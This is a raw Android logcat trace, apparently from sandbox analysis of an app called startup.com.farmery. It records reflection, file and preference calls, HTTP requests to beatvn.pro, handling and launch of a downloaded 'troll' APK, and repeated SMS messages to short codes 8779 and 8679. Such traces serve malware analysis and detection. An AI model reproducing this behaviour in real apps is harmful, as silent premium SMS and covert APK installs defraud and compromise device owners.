D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.res.ResourcesKey]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ResourcesManager]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/app/startup.com.farmery-1/base.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/cache]
D/S4URC   ( 3500): [SDK] [java.io.File] [mkdirs] [FilePath][String] [/data/data/startup.com.farmery/cache]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/cache]
D/S4URC   ( 3500): [SDK] [android.app.Activity][onCrate] [Class][ComponentInfo{startup.com.farmery/startup.com.farmery.MainActivity}]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [com.android.webview]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.google.android.webview]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [com.android.webview]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/com.android.webview]
D/S4URC   ( 3500): [SDK] [dalvik.system.BaseDexClassLoader] [Constructor] [DexPath][String] [/system/app/webview/webview.apk] [NDKPath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [getName] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [isDirectory] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [isFile] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [dalvik.system.DexFile] [openDexFile] [DexPath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/lib]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database.SQLiteDatabase]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher.database$SQLiteDatabase]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [net.sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [net$sqlcipher$database$SQLiteDatabase]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[Z]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[I]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[J]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl.EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.SharedPreferencesImpl$EditorImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [[F]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.admin.DevicePolicyManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.Activity]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Environment]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.ContentResolver]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Process]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.Camera]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.accounts.AccountManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.location.Location]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.webkit.WebView]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.media.MediaRecorder]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.Intent]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.BaseDexClassLoader]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexFile]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [dalvik.system.DexClassLoader]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ApplicationPackageManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.app.ActivityManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Runtime]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.lang.Class]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.HttpURLConnection]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.internal.http.HttpURLConnectionImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [java.net.Socket]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.telephony.TelephonyManager]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Debug]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.hardware.SensorManager]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/system/app/webview/webview.apk]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.webview.chromium.WebViewChromiumFactoryProvider]
D/S4URC   ( 3500): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium.so]
D/S4URC   ( 3500): [SDK] [java.lang.Runtime] [loadLibrary] [SoPath][String] [webviewchromium_plat_support]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/app/webview/lib/arm/libwebviewchromium_plat_support.so]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/vendor/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/system/lib/libwebviewchromium_plat_support.so]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][lastVersionCodeUsed] [Return][0]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][WebViewChromiumPrefs.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][lastVersionCodeUsed] [Value][300001]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs]
D/S4URC   ( 3500): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/WebViewChromiumPrefs.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/app_webview]
D/S4URC   ( 3500): [SDK] [java.io.File] [mkdir] [FilePath][String] [/data/data/startup.com.farmery/app_webview]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/app_webview]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.HEADSET_PLUG,
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getPackageInfo] [FindPackageName][String] [startup.com.farmery]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getApplicationInfo] [FindApplicationName][String] [startup.com.farmery]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.TIMEZONE_CHANGED,
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/databases]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [getDatabasePath] [PathInfo][String] [foo]
D/S4URC   ( 3500): [SDK] [java.io.File] [getParent] [FilePath][String] [/data/data/startup.com.farmery/databases/foo]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][android.intent.action.PROXY_CHANGE,
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.os.Message]
D/S4URC   ( 3500): [SDK] [android.webkit.WebView] [loadUrl] [Url][file:///android_asset/index.html]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/proc/meminfo]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Day1] [Return][-1]
D/S4URC   ( 3500): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [android.content.pm.ApplicationInfo]
D/S4URC   ( 3500): [SDK] [android.app.ApplicationPackageManager] [getInstalledApplications]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.okhttp.HttpHandler]
D/S4URC   ( 3500): [SDK] [android.content.ContentResolver] [registerContentObserver] [URL][String] [content://settings/system/enable_stylus_gestures]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLContextImpl]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/dev/urandom] [RETURN][int] [90]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.KeyManagerFactoryImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jcajce.provider.keystore.bc.BcKeyStoreSpi$Std]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.OpenSSLRandom]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustManagerFactoryImpl]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.conscrypt.TrustedCertificateKeyStoreSpi]
D/S4URC   ( 3500): [SDK] [java.lang.Class] [forName] [FindClass][String] [com.android.org.bouncycastle.jce.provider.PKIXCertPathValidatorSpi]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/data/misc/keychain/pins]
D/S4URC   ( 3500): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://beatvn.pro/cpi/]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getBoolean] [Boolean][isFirst] [Return][true]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][getInt] [Int][Day1] [Return][-1]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Day1] [Value][8]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [RETURN][int] [93]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [MODE][int] [0660]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][commit]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [SENT1]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [DELIVER1]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][SENT1,
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][DELIVER1,
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8779] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3500): [SDK] [java.net] [HttpURLConnection] [URL][String] [http://beatvn.pro/cpi/]
D/S4URC   ( 3500): [NDK] [SYSCALL] [socket] [TYPE][string] [TCP]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/sdcard/downloadedfile0troll.apk]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/sdcard/downloadedfile0troll.apk]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/sdcard/downloadedfile0troll.apk] [RETURN][int] [95]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.os.Environment] [getExternalStorageDirectory] [DirectoryPath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/storage/sdcard0]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [android.intent.action.VIEW]
D/S4URC   ( 3500): [SDK] [java.io.File] [Constructor] [FilePath][String] [/storage/sdcard0/downloadedfile0troll.apk]
D/S4URC   ( 3500):  [Method][getBoolean] [Boolean][isSecond] [Return][true]
D/S4URC   ( 3500):  [Method][getInt] [Int][Day2] [Return][-1]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Day2] [Value][8]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml] [DesFile][/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [NEW_PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [RETURN][int] [92]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [chmod] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [MODE][int] [0660]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [stat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [delete] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [lstat] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [unlink] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [SENT2]
D/S4URC   ( 3500): [SDK] [android.content.Intent] [Constructor] [IntentInfo][String] [DELIVER2]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][SENT2,
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper] [registerReceiver][IntentFilter][DELIVER2,
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8779] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500): [SDK] [android.telephony.SmsManager] [sendTextMessage] [DesADD] [8679] [SourceADD] [null] [TextMessage] [TVD GNAUAN]
D/S4URC   ( 3500):  [Method][getBoolean] [Boolean][isThird] [Return][true]
D/S4URC   ( 3500):  [Method][getInt] [Int][Day3] [Return][-1]
D/S4URC   ( 3500): [SDK] [android.content.ContextWrapper][getSharedPreferences] [File][data.xml] [MODE][MODE_PRIVATE] [Method][putInt] [Key][Day3] [Value][8]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [SDK] [java.io.File] [exists] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [access] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [renameTo] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml] [DesFile][/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [NDK] [SYSCALL] [rename] [ORIG_PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [NEW_PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml.bak]
D/S4URC   ( 3500): [SDK] [java.io.File] [getPath] [FilePath][String] [/data/data/startup.com.farmery/shared_prefs/data.xml]
D/S4URC   ( 3500): [NDK] [SYSCALL] [open] [PATH][string] [/data/data/startup.com.farmery/shared_prefs/data.xml] [RETURN][int] [92]
